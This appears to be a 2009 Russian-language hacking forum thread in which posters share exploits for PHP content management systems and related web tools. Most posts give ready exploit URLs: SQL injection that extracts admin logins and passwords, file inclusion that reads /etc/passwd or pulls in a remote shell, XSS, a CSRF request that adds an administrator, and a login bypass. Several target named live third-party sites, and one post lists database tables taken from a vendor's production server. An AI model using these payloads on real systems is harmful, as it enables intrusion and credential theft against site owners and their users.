require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
include($phpbb_root_path . 'includes/functions_display.' . $phpEx);

Exploit:

http://site.com/portal/includes/portal_block.php?phpbb_root_path=../../../../../../../etc/passwd
http://site.com/includes/acp/acp_lcxbbportal.php?phpbb_root_path=../../../../../../../etc/passwd

photoDiary 1.2

Download: http://code.google.com/p/photodiary/downloads/list

Vuln File: admin/index.php

Vuln Code:
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];

Exploit:
http://site.com/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--

Например на оффе:
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--

Iceangel_

30.04.2009, 04:51

Уязвимости RevolutionBB 1.6(возможно и более ранние версии)
download: http://www.revbb.net/releases/revbbv1-6.zip
dork: "RevolutionBB 2008-2009"

SQL-injection(требования: magic_quotes=off)

Инъекции есть буквально в каждом скрипте, приведу всего лишь 1 пример:

уязвимый код:

composemsg.php

$id = $_GET['id'];
$privatem = mysql_query(
"SELECT *
FROM
".PREFIX."pms
WHERE id='$id'"
);
$private = mysql_fetch_array($privatem);

эксплуатирование:
composemsg.php?id=1'+union+select+1,2,3,concat_ws( 0x3a,username,password),5,6,7,8,9,10+from+<prefix>_members--+

(с) Iceangel_

ElteRUS

13.05.2009, 00:48

BLOX CMS
Сайт: http://blox.ru/

SQL-injection

Уязвимый код:
editPageParams.php

. . .
if (empty($_SESSION['page']))
$aa = $_GET['page'];
else $aa = $_SESSION['page'];

$U = LD($aa);
. . .

getPageParams.php

function LD($NA)
{
. . .
if (!empty($NA))
{
$result = mysql_query( "SELECT * FROM ".C."pages WHERE id=$NA LIMIT 1");
. . .
}

Эксплуатация:

site.com/?page=-1+union+select+1,2,3,4,5,concat_ws(0x2F,login,pass wrd)+from+[префикс]_users--+

bug1z

13.05.2009, 17:26

Так же у вышеуказанного скрипта есть уязвимость позволяющая попасть в админку без авторизации!
В скрипте authenticate.php
<?php
include BLOXDIR."/inc/redirect.php"; RO(); function RO() { $O = $_POST['login']; $BM = $_POST['passwrd']; $TJ = false; if (!empty($O) && !empty($BM)) { $A = "SELECT permit FROM ".C."users WHERE login = '$O' AND passwrd = '$BM'"; if ($result = mysql_query($A)) { if ($row = mysql_fetch_assoc($result)) { if ('admin' == $O) $TJ = true; elseif (!empty($row['permit'])) $TJ = true; } } } if (!empty($TJ)) { $_SESSION['login'] = $O; if (isset($_POST['savePasswrd'])) { if (!empty($_POST['savePasswrd'])) { $V = array ($_POST['login'], $_POST['passwrd']); $NP = base64_encode(serialize($V)); if (setcookie('blox', "$NP", time() + 432000)); } else if (setcookie('blox', "", time() + 10)); } } } ?>

В самом начале скпипта мы видим инклуд некого редерикт.пхп:
include BLOXDIR."/inc/redirect.php
Смотрим его код:
<?php
KQ(); function KQ() { $BG = "?"; if (SID) $BG .= SID; header("Location: $BG"); } ?>

Вроде ничего особенного, обычный редерикт, но после header("Location: $BG"); не указан die() or exit() , таким образом нас хоть и пересылает по адресу редерикта, но скрипт всё равно выполняется!
Скачав прогу инеткряк или её аналог мы можем послать http запрос и попасть в админку!

[underwater]

14.05.2009, 21:13

BIGACE
Download:http://downloads.sourceforge.net/bigace/bigace_2.5_RC2.zip

POST:
<script type="text/javascript">
function changeURL(){ var URL = document.getElementById("site"); document.forms[0].action= URL.value; }
</script>
<form method="POST" id="target" action="">
Test site:<br>
<input type="text" size="80" id="site" value="http://site.com/public/index.php?cmd=application&id=-1_tsearch_len">
<br><br>JavaScript to execute:<br>
<textarea name="language" id="JScode" rows="5" cols="60">>"><script>alert(0);</script></textarea>
<input type="submit" OnClick="changeURL()">
</form>

bug1z

14.05.2009, 21:45

GENERAL-CMS

Как они заявляют:
General-CMS - одна из ведущих систем управления сайтом в своей отрасли!

Увы уязвимый код показать не смогу, так как двиг платный, а платить не хочется :D

Возьмём офф сайт:

http://www.cms-soft.ru/

И офигеем, за что они хотят от 800р до 3000р =//

SQL INJECTION:
1)
http://www.cms-soft.ru/index.php?level1&levelid=18'+union+select+1,2,version()--+/index.php

2)
http://cms-soft.ru/cms/7'+union+select+1,2,version()--+/index.php

Итак, что я вытянул:

на сайте крутится 4 БД:

information_schema
shop-imperial
shop-imperial_affiliate
shop-imperial_post

из information_schema я вытащил названия таблиц, их там предостаточно:

cmssystemaddress
cmssystemadmin
cmssystemadrscom
cmssystemcategories
cmssystemcategoriesdop
cmssystemcatshops
cmssystemmetashops
cmssystemonline
cmssystemorder
cmssystemordergoods
cmssystempages
cmssystempagesdop
cmssystempassport
cmssystemshops
cmssystemusers
demoadmin
democategories
democategoriesdop
demometa
demometadop
demopages
demopagesdop
flashcat_backlinks
flashcat_categories
flashcat_conf
flashcat_sites
generalavtoaddress
generalavtoadmin
generalavtoadrscom
generalavtocategories
generalavtocategoriesdop
generalavtocatshops
generalavtometashops
generalavtoonline
generalavtoorder
generalavtoordergoods
generalavtopages
generalavtopagesdop
generalavtopassport
generalavtoshops
generalavtousers
generalboardruaddress
generalboardruadmin
generalboardruadrscom
generalboardruannouncements
generalboardrucatboard
generalboardrucategories
generalboardrucategoriesdop
generalboardrucatshops
generalboardrumetaboard
generalboardrumetashops
generalboardruonline
generalboardruorder
generalboardruordergoods
generalboardrupages
generalboardrupagesdop
generalboardrupassport
generalboardrushops
generalboardruusers
generalcultureruaddress
generalcultureruadmin
generalcultureruadrscom
generalcultureruannouncements
generalculturerucatboard
generalculturerucategories
generalculturerucategoriesdop
generalculturerucatshops
generalculturerumetaboard
generalculturerumetashops
generalcultureruonline
generalcultureruorder
generalcultureruordergoods
generalculturerupages
generalculturerupagesdop
generalculturerupassport
generalculturerushops
generalcultureruusers
generalestatesruaddress
generalestatesruadmin
generalestatesruadrscom
generalestatesruannouncements
generalestatesrucatboard
generalestatesrucategories
generalestatesrucategoriesdop
generalestatesrucatshops
generalestatesrumetaboard
generalestatesrumetashops
generalestatesruonline
generalestatesruorder
generalestatesruordergoods
generalestatesrupages
generalestatesrupagesdop
generalestatesrupassport
generalestatesrushops
generalestatesruusers
generalhouseaddress
generalhouseadmin
generalhouseadrscom
generalhouseannouncements
generalhousecatboard
generalhousecategories
generalhousecategoriesdop
generalhousecatshops
generalhousemetaboard
generalhousemetashops
generalhouseonline
generalhouseorder
generalhouseordergoods
generalhousepages
generalhousepagesdop
generalhousepassport
generalhouseshops
generalhouseusers
generalpropertyruaddress
generalpropertyruadmin
generalpropertyruadrscom
generalpropertyruannouncements
generalpropertyrucatboard
generalpropertyrucategories
generalpropertyrucategoriesdop
generalpropertyrucatshops
generalpropertyrumetaboard
generalpropertyrumetashops
generalpropertyruonline
generalpropertyruorder
generalpropertyruordergoods
generalpropertyrupages
generalpropertyrupagesdop
generalpropertyrupassport
generalpropertyrushops
generalpropertyruusers
generalrealruaddress
generalrealruadmin
generalrealruadrscom
generalrealruannouncements
generalrealrucatboard
generalrealrucategories
generalrealrucategoriesdop
generalrealrucatshops
generalrealrumetaboard
generalrealrumetashops
generalrealruonline
generalrealruorder
generalrealruordergoods
generalrealrupages
generalrealrupagesdop
generalrealrupassport
generalrealrushops
generalrealruusers
generalscienceaddress
generalscienceadmin
generalscienceadrscom
generalscienceannouncements
generalsciencecatboard
generalsciencecategories
generalsciencecategoriesdop
generalsciencecatshops
generalsciencemetaboard
generalsciencemetashops
generalscienceonline
generalscienceorder
generalscienceordergoods
generalsciencepages
generalsciencepagesdop
generalsciencepassport
generalscienceshops
generalscienceusers
generaltourismaddress
generaltourismadmin
generaltourismadrscom
generaltourismannouncements
generaltourismcatboard
generaltourismcategories
generaltourismcategoriesdop
generaltourismcatshops
generaltourismmetaboard
generaltourismmetashops
generaltourismonline
generaltourismorder
generaltourismordergoods
generaltourismpages
generaltourismpagesdop
generaltourismpassport
generaltourismshops
generaltourismusers
importaddress
importadmin
importadrscom
importcategories
importcategoriesdop
importcatshops
importmetashops
importonline
importorder
importordergoods
importpages
importpagesdop
importpassport
importshops
importusers
kirilladdress
kirilladmin
kirilladrscom
kirillannouncements
kirillcatboard
kirillcategories
kirillcategoriesdop
kirillcatshops
kirillmetaboard
kirillmetashops
kirillonline
kirillorder
kirillordergoods
kirillpages
kirillpagesdop
kirillpassport
kirillshops
kirillusers
pinaevaddress
pinaevadmin
pinaevadrscom
pinaevannouncements
pinaevcatboard
pinaevcategories
pinaevcategoriesdop
pinaevcatshops
pinaevmetaboard
pinaevmetashops
pinaevonline
pinaevorder
pinaevordergoods
pinaevpages
pinaevpagesdop
pinaevpassport
pinaevshops
pinaevusers
shopimperial2address
shopimperial2admin
shopimperial2adrscom
shopimperial2categories
shopimperial2categoriesdop
shopimperial2catshops
shopimperial2metashops
shopimperial2online
shopimperial2order
shopimperial2ordergoods
shopimperial2pages
shopimperial2pagesdop
shopimperial2passport
shopimperial2shops
shopimperial2users
shopimperialadmin
shopimperialcategories
shopimperialcategoriesdop
shopimperialmeta
shopimperialmetadop
shopimperialpages
shopimperialpagesdop
trastsoftaddress
trastsoftadmin
trastsoftadrscom
trastsoftcategories
trastsoftcategoriesdop
trastsoftcatshops
trastsoftmetashops
trastsoftonline
shopimperialmetadop
shopimperialpages
shopimperialpagesdop
trastsoftaddress
trastsoftadmin
trastsoftadrscom
trastsoftcategories
trastsoftcategoriesdop
trastsoftcatshops
trastsoftmetashops
trastsoftonline
trastsoftorder
trastsoftordergoods
trastsoftpages
trastsoftpagesdop
trastsoftpassport
trastsoftshops
trastsoftusers
traststroyaddress
traststroyadmin
traststroyadrscom
traststroycategories
traststroycategoriesdop
traststroycatshops
traststroymetashops
traststroyonline
traststroyorder
traststroyordergoods
traststroypages
traststroypagesdop
traststroypassport
traststroyshops
traststroyusers
vall1address
vall1admin
vall1adrscom
vall1categories
vall1categoriesdop
vall1catshops
vall1metashops
vall1online
vall1order
vall1ordergoods
vall1pages
vall1pagesdop
vall1passport
vall1shops
vall1users
vall3address
vall3admin
vall3adrscom
vall3categories
vall3categoriesdop
vall3catshops
vall3metashops
vall3online
vall3order
vall3ordergoods
vall3pages
vall3pagesdop
vall3passport
vall3shops
vall3users
vogeanorgruaddress
vogeanorgruadmin
vogeanorgruadrscom
vogeanorgruannouncements
vogeanorgrucatboard
vogeanorgrucatcompany
vogeanorgrucategories
vogeanorgrucategoriesdop
vogeanorgrucatshops
vogeanorgrufirms
vogeanorgrumetaboard
vogeanorgrumetacompany
vogeanorgrumetashops
vogeanorgruonline
vogeanorgrupages
vogeanorgrupagesdop
vogeanorgrupassport
vogeanorgrushops
vogeanorgruusers
vogeanruaddress
vogeanruadmin
vogeanruadrscom
vogeanrucategories
vogeanrucategoriesdop
vogeanrucatshops
vogeanrumeta
vogeanrumetadop
vogeanrumetashops
vogeanruonline
vogeanruorder
vogeanruordergoods
vogeanrupages
vogeanrupagesdop
vogeanrupassport
vogeanrushops
vogeanruusers
generaladdress
generaladmin
generaladrscom
generalannouncements
generalcatboard
generalcategories
generalcategoriesdop
generalcatshops
generalmetaboard
generalmetashops
generalonline
generalorder
generalordergoods
generalpages
generalpagesdop
generalpassport
generalshops
generalusers
vogeanorgadmin
vogeanorgcategories
vogeanorgcategoriesdop
vogeanorgmeta
vogeanorgmetadop
vogeanorgpages
vogeanorgpagesdop
antipolitikaaddress
antipolitikaadmin
antipolitikaadrscom
antipolitikaannouncements
antipolitikacatboard
antipolitikacategories
antipolitikacategoriesdop
antipolitikacatshops
antipolitikametaboard
antipolitikametashops
antipolitikaonline
antipolitikaorder
antipolitikaordergoods
antipolitikapages
antipolitikapagesdop
antipolitikapassport
antipolitikashops
antipolitikausers
articlesnetaddress
articlesnetadmin
articlesnetadrscom
articlesnetannouncements
articlesnetcatboard
articlesnetcategories
articlesnetcategoriesdop
articlesnetcatshops
articlesnetmetaboard
articlesnetmetashops
articlesnetonline
articlesnetorder
articlesnetordergoods
articlesnetpages
articlesnetpagesdop
articlesnetpassport
articlesnetshops
articlesnetusers
catalogmusicaddress
catalogmusicadmin
catalogmusicadrscom
catalogmusicannouncements
catalogmusiccatboard
catalogmusiccategories
catalogmusiccategoriesdop
catalogmusiccatshops
catalogmusicmetaboard
catalogmusicmetashops
catalogmusiconline
catalogmusicorder
catalogmusicordergoods
catalogmusicpages
catalogmusicpagesdop
catalogmusicpassport
catalogmusicshops
catalogmusicusers
demosaddress
demosadmin
demosadrscom
demosannouncements
demoscatboard
demoscategories
demoscategoriesdop
demoscatshops
demosmetaboard
demosmetashops
demosonline
demosorder
demosordergoods
demospages
demospagesdop
demospassport
demosshops
de

аки хранятся в таблице cmssystemadmin.
Колонки:
id,login,password,name

Удачи!

bug1z

15.05.2009, 17:17

MagicSite CMS XSS

В строке поиска <script>alert('Antichat')</script>
http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%2 7%29%3C%2Fscript%3E&x=0&y=0
Одним запросом и XSS и раскрытие путей и скуль инжект не далеке ;)
На сервере у них magic_quotes=ON, так как даные слешируются!
http://www.magicsite.ru/search.php?sword=1'
Вы искали: "1\'"
Не далеко и скуль инжект!
Админка: http://www.magicsite.ru/admin/

Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!

P.S.: Её продают за 24 505,00 р. =//

bug1z

15.05.2009, 17:54

skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29% 3C%2Fscript%3E&m=search

ElteRUS

16.05.2009, 15:44

SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_

SQL-injection

Уязвимый код:
photo.php

. . .
if (isset($_GET['photo_id'])) {

$photo_id = mysql_real_escape_string($_GET['photo_id']);
$sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id";
$result=mysql_query($sql);
. . .

Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе :D
Аналогично с переменной event_id в этом же скрипте

. . .
elseif (isset($_GET['event_id'])) {

$event_id = mysql_real_escape_string($_GET['event_id']);
. . .
$sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id";
$result=mysql_query($sql);
. . .

Эксплуатация:

site.com/index.php?pages_id=1&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin

Пример:

http://www.temoinsdelamisericorde.fr/index.php?pages_id=38&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin&p=0

Iceangel_

19.05.2009, 18:25

Уязвимости Pinpin Content 0.1 Beta
download: http://garbure.org/garbure/pinpin_content/pinpin-0.1-beta.tar.gz

RFI(требования: register_globals=on)
/pinpin/pinpin.php
Уязвимость существует из-за отсутствия предварительного определения переменной $level_path, при непосредственном обращении к скрипту.
уязвимый код:

include "$level_path/pinpin/pinpin.conf.php";

эксплуатирование:
/pinpin/pinpin.php?level_path=http://site.com/shell.txt?

(с) Iceangel_

[underwater]

21.05.2009, 20:45

Cifshanghai Script

Download: http://www.cifshanghai.com/
Vuln File: new.php
Exploit: http://localhost/[path]/new.php?id=[SQL]
POC:
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3 a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(nam e,0x3a,password),8%20from%20fk_admin-

AkyHa_MaTaTa

23.05.2009, 08:49

Etomite CMS Blind Sql injection, чтения локальных файлов
Производитель:http://www.etomite.org/
Продукт:Etomite CMS
Версия:1.1
Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off):

http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00

Blind Sql injection
Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)):

$referer = urldecode($_SERVER['HTTP_REFERER']);
if(empty($referer)) {
$referer = "Unknown";
} else {
$pieces = parse_url($referer);
$referer = $pieces['scheme']."://".$pieces['host'].$pieces['path'];
}

...........................

$sql = "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206

пример реферера для blind:

http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+

необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)

[underwater]

26.05.2009, 17:16

CuteNews
CSRF:

http://localhost/cutenews/index.php

POST /cutenews/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/cutenews/index.php?mod=editusers&action=list
Cookie: lastusername=underwater; username=underwater; md5_password=xxx;
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

http://localhost/cutenews/index.php?regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

Пользователь Добавлен

Пользователь underwater был успешно добавлен в качестве администратора

вернуться

Про шелл уже не стал писать:=\

Iceangel_

03.06.2009, 09:42

Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip

Blind SQL-injection(требования: magic_quotes=off)
updatenote.php

уязвимый код:

$id = $_GET["fieldname"];
$note = $_GET["content"];
mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert");

эксплуатирование:
updatenote.php?content=9999'+or+if(ascii(substring ((select+concat_ws(0x3a,user,pass)+from+admin),1,1 ))>1,BENCHMARK(2000000,md5(current_date)),2)--+
в случае истинности условия получаем небольшую задержку

bypass(требования: magic_quotes=off)
login.php
уязвимый код:

$user = $_POST['user'];
$pass = $_POST['pass'];

if($_POST['login']){
// QUERY ADMIN DATABASE
$getlogin = "SELECT * FROM admin WHERE user='$user' and pass='$pass'";
$getlogin2 = mysql_query($getlogin);

эксплуатирование:
логинимся с именем:
' or 1=1--

(с) Iceangel_

Iceangel_

03.06.2009, 09:55

skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29% 3C%2Fscript%3E&m=search

LFI(требования: register_globals=on)
/forums/profile.php

Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд
уязвимый код:

define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);

эксплуатирование:
/forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd

(с) Iceangel_

Iceangel_

03.06.2009, 16:20

Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip

LFI
(требования: register_globals=on)
/timeago.php
уязвимый код:

if (file_exists("data/comments/$nid.ip.php")) {
include("data/comments/$nid.ip.php");

эксплуатирование:
/timeago.php?nid=../../../../../../../../../../../../etc/passwd

(с) Iceangel_

mailbrush

03.06.2009, 16:39

Программа: WebEyes Guest Book 3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjec ts

eLWAux

30.06.2009, 22:58

поисковик TSEP <=0.942.02
http://milw0rm.com/exploits/9057

wolmer

01.07.2009, 14:48

Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон))

Офф сайт: sourcebans.net

Статистика уязвимостей

Всего уязвимостей найденно: 5
XSS: 3
MySql Error: 1
Плохая проверка данных: 1

1. ACTIVE XSS

Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php

Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID

Описание:
Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами)
Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

2.ACTIVE XSS 2

Уязвимая страница: sait.ru/index.php
Проблемный файл: Точно не известно

Уязвимые поля: Intro Title

Описание:
В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить :)

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались)

3.ACTIVE XSS 3

Уязвимая страница: sait.ru/index.php?p=admin&c=mods
Проблемный файл: pages/admin.edit.mod.php

Уязвимые поля: Mod Name, Mod Folder

Описание:
Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

4. MySql Error

Уязвимая страница: sait.ru/index.php?p=submit
Проблемный файл: pages/page.submit.php

Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value

Описание:
Описания нету

Автор уязвимости: .wolmer
Версии: во всех версиях до 1.4.5 (включительно 1.4.5)

5. Не достаточная проверка данных

Уязвимая страница: sait.ru/index.php
Проблемный файл: includes/sb-callback.php

Уязвимые параметры: отсуствуют

Описание:
Не достаточная обработка при смене емаила
Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[])
Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans)

Автор уязвимости: Mr. Anonymous
Версии: во всех версиях до 1.4.2 (включительно 1.4.2)

На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка

eLWAux

05.07.2009, 22:56

phpBMS v0.96
половина скриптов в дирах

phpBMS v0.96
phpbms.org

eLwaux(c)2009, uasc.org.ua
http://phpbms.org/trial/

## ## ##
SQL Inj
-----------------------------------------------------------------------------------------------
$querystatement="SELECT
if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value)
AS value FROM discounts WHERE id=".$_GET["id"];
$queryresult = $db->query($querystatement);
-----------------------------------------------------------------------------------------------
PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())

## ## ##
SQL Inj
\dbgraphic.php
-----------------------------------------------------------------------------------------------
$querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM
".$_GET["t"]." WHERE id=".$_GET["r"];
$queryresult=$db->query($querystatement);
-----------------------------------------------------------------------------------------------
PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1

## ## ##
SQL Inj
-----------------------------------------------------------------------------------------------
if(isset($_GET["cmd"])){
switch($_GET["cmd"]){
case "show":
showSearch($_GET["tid"],$_GET["base"],$db);
break;
}//end switch
-----------------------------------------------------------------------------------------------
PoC:
/advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2
/advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2

## ## ##
pXSS
-----------------------------------------------------------------------------------------------
<form name="form1" method="post" action="<?php echo
$_SERVER["PHP_SELF"]?>">
-----------------------------------------------------------------------------------------------
PoC:
\index.php/"><script>alert(/xss/);</script><div id="
\modules\base\myaccount.php/"><script>alert(/xss/);</script><div id="
\phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div
id="
\phpbms\modules\base\tabledefs_options.php\">{XSS}
\phpbms\modules\base\adminsettings.php\">{XSS}

## ## ##
Path Disclosure
/footer.php
/header.php
/advancedsearch.php?cmd=show&
/choicelist.php

eLWAux

06.07.2009, 17:03

GenCMS
GenCMS
http://gencms.berlios.de/

eLwaux(c)2009

LFI
/show.php
----------------------------------------------------------------------------------------------------
18: $param = $_GET['p'];
19: if(empty($param)) $param = 'news';
20: //get right page
21: //$page = $param.'.php';
22:
23: //static or dynamic
24: if(GC_FULLSTATIC)
25: {
26: $page = $param.'.htm';
27: staticpage($page);
28: }
29: else
30: {
31: $page = GC_IPATH.'_base/sites/'.$param.'.php';
32: dynamicpage($page);
33: }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00

LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
14: if(!empty($_GET['step'])) $Step = $_GET['step'];
23: if ($Step == "2")
24: {
25: // allgemeine settings
26: //include blocks from template config
27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
28: $TPLBlocks = explode(';',$TemplateSettings);
29: }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )

[underwater]

13.07.2009, 00:06

SqliteAdmin

CSRF

http://site/sqlitemanager/main.php?dbsel=1
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: 190.161.4.211
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://site/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteI f%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A+++ +if+%28%24compare%29+%7B%0D%0A++++++++return+%24go od%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+% 24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save

eLWAux

27.07.2009, 18:38

elgg <= 1.5 vuln LFI

POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD

необходимо, чтоб в табл datalists
simplecache_enabled=0
(по дефолту =1 xD)

/_css/js.php:
33: $viewinput['view'] = 'js/' . $_GET['js'];
42: require_once(dirname(dirname(__FILE__)) . '/simplecache/view.php');
/simplecache/view.php:
26: $view = $viewinput['view'];
30: if (@mysql_select_db($CONFIG->dbname,$mysql_dblink)) {
48: if ($simplecache_enabled || $override) {
49: $filename = $dataroot . 'views_simplecache/' . md5($viewtype . $view);
51: $contents = file_get_contents($filename);
56: } else {
59: $contents = elgg_view($view);
/lib/elgglib.php:
237: function elgg_view($view, ..
317: foreach($viewlist as $priority => $view) {
321: if (file_exists($view_location . "{$viewtype}/{$view}.php") &&
!include($view_location . "{$viewtype}/{$view}.php")) {

Ins3t

05.08.2009, 10:19

Irokez CMS 0.7.1 SQL inlection

Уязвимость хранится в функции select() класса table.class.php. Дело в том, что передаваемые функцией параметры ничем не фильтруются.

Copeц бажной функции:

function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);

$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);

$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}

Условия:magic_quotes_gpc = Off

Эксплатация:

http://localhost/ru/news/7'+union+select+1,2,concat_ws(0x3a,login,pass),4,5 ,6,7,8,9,10,11,12+from+icm_users--+/?page=1

http://localhost/ru/polls/4'+AND+ascii(lower(substring(version(),1,1)))>5--+/

Для защиты данной функции можно использовать функцию mysql_escape_string()

Пример защиты:

function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$id = mysql_escape_string($id);
$query = "select t.*, m.* from {$this->_name} m"
